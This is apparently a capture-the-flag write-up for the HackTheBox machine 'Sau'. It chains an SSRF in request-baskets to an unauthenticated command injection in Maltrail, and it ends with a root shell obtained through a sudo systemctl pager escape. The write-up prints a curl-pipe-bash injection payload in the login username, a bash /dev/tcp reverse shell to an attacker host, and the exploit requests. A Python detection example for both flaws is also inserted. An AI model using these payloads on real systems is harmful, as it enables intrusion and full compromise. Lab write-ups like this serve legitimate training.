Sau


Enumeration

Zenmap:

Check the website on port 55555.
Search for vulnerabilities in the Basket website: Server-Side Request Forgery, CVE-2023-27163.
Exploitation:
PS D:\thehackbox\Machines\Sau> curl.exe --location 'http://sau.htb:55555/api/baskets/yu8' --header 'Content-Type: application/json' --data '{\"forward_url\": \"http://127.0.0.1:80/\",\"proxy_response\": true,\"insecure_tls\": false,\"expand_path\": true,\"capacity\": 250}'
{"token":"p9irXIdjY5vH7oVZ0CcPOO5xG0c5CmdIxUGuK7Fv2bnD"}
PS D:\thehackbox\Machines\Sau>
Visit the web link just created:

Gaining access puma

I can see this is a Maltrail website, version 0.53. Searching for vulnerabilities in this site: Unauthenticated OS Command Injection in stamparm/maltrail.
Exploit as follows:
PS D:\thehackbox\Machines\Sau> curl.exe --location 'http://sau.htb:55555/api/baskets/dryu8' --header 'Content-Type: application/json' --data '{\"forward_url\": \"http://127.0.0.1:80/login\",\"proxy_response\": true,\"insecure_tls\": false,\"expand_path\": true,\"capacity\": 250}'
{"token":"GUxRlncBqnKH-euFg84q4dTe9AIpNO890bqke0UGzKaY"}
PS D:\thehackbox\Machines\Sau>
After creating the website:
PS D:\thehackbox\Machines\Sau> more .\shell
#!/bin/bash
bash -i >& /dev/tcp/<IP attack>/8888 0>&1
PS D:\thehackbox\Machines\Sau> python  -m http.server 80
Serving HTTP on :: port 80 (http://[::]:80/) ...
::ffff:10.129.**.** - - [09/Jul/2023 02:55:32] "GET /shell HTTP/1.1" 200 -

#-----------------------------------
PS D:\thehackbox\Machines\Sau> curl.exe "http://sau.htb:55555/dryu8" --data 'username=;`curl <IP attack>/shell | bash`'

#-----------------------------------
PS D:\thehackbox\Machines\Sau> ncat.exe -l 8888
bash: cannot set terminal process group (869): Inappropriate ioctl for device
bash: no job control in this shell
puma@sau:/opt/maltrail$ id
id
uid=1001(puma) gid=1001(puma) groups=1001(puma)
puma@sau:/opt/maltrail$ whoami
whoami
puma
puma@sau:/opt/maltrail$
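Both weaknesses chained above can be caught on the defending side with two small checks. The Python below is an added example, not part of this writeup or of either project: it classifies a request-baskets creation body whose forward_url points at the host itself or an internal address (the SSRF step), and flags a Maltrail login POST whose username carries shell metacharacters (the injection step). All sample inputs are constructed.

```python
import ipaddress
import json
import re
from urllib.parse import urlsplit, unquote_plus

# Characters that let a login "username" break out of a shell command line.
SHELL_META = re.compile(r"[;`|&$\r\n]")

def forward_url_is_internal(basket_body: str) -> bool:
    """True when a request-baskets creation body points forward_url at the
    server itself or at an internal address, i.e. the SSRF pattern above.
    DNS names other than localhost are not resolved here, so pair this
    check with egress filtering on the basket host."""
    url = json.loads(basket_body).get("forward_url", "")
    if not url:
        return False                      # nothing is forwarded at all
    host = (urlsplit(url).hostname or "").lower()
    if host == "localhost" or host.endswith(".localhost"):
        return True
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return False                      # a DNS name: cannot be classified offline
    return ip.is_loopback or ip.is_private or ip.is_link_local or ip.is_unspecified

def parse_form(body: str) -> dict:
    """Minimal application/x-www-form-urlencoded parser (splits on '&' only)."""
    fields = {}
    for pair in body.split("&"):
        key, _, value = pair.partition("=")
        fields[unquote_plus(key)] = unquote_plus(value)
    return fields

def username_has_injection(login_body: str) -> bool:
    """True when the POSTed username carries shell metacharacters, which a
    login form has no legitimate reason to accept."""
    username = parse_form(login_body).get("username", "")
    return bool(SHELL_META.search(username))

if __name__ == "__main__":
    # Constructed samples mirroring the shape of the requests in the writeup.
    ssrf_body = '{"forward_url": "http://127.0.0.1:80/login", "proxy_response": true}'
    benign_body = '{"forward_url": "https://hooks.example.org/in", "proxy_response": true}'
    print(forward_url_is_internal(ssrf_body), forward_url_is_internal(benign_body))
    print(username_has_injection("username=;id&password=x"))
    print(username_has_injection("username=admin&password=changeme"))
```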

Privilege escalation

puma@sau:/opt/maltrail$ script /dev/null /bin/bash
script /dev/null /bin/bash
Script started, file is /dev/null
puma@sau:/opt/maltrail$ sudo -l
sudo -l
Matching Defaults entries for puma on sau:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User puma may run the following commands on sau:
    (ALL : ALL) NOPASSWD: /usr/bin/systemctl status trail.service
puma@sau:/opt/maltrail$ sudo /usr/bin/systemctl status trail.service
sudo /usr/bin/systemctl status trail.service
WARNING: terminal is not fully functional
-  (press RETURN)!sh
!sshh!sh
# whoami
whoami
root
# id
id
uid=0(root) gid=0(root) groups=0(root)
#

There isn't much of a challenge in this machine. Boring, really.
Dryu8

Dryu8 is just a newbie in pentesting and loves to drink beer. I will be happy if you can donate me with a beer.
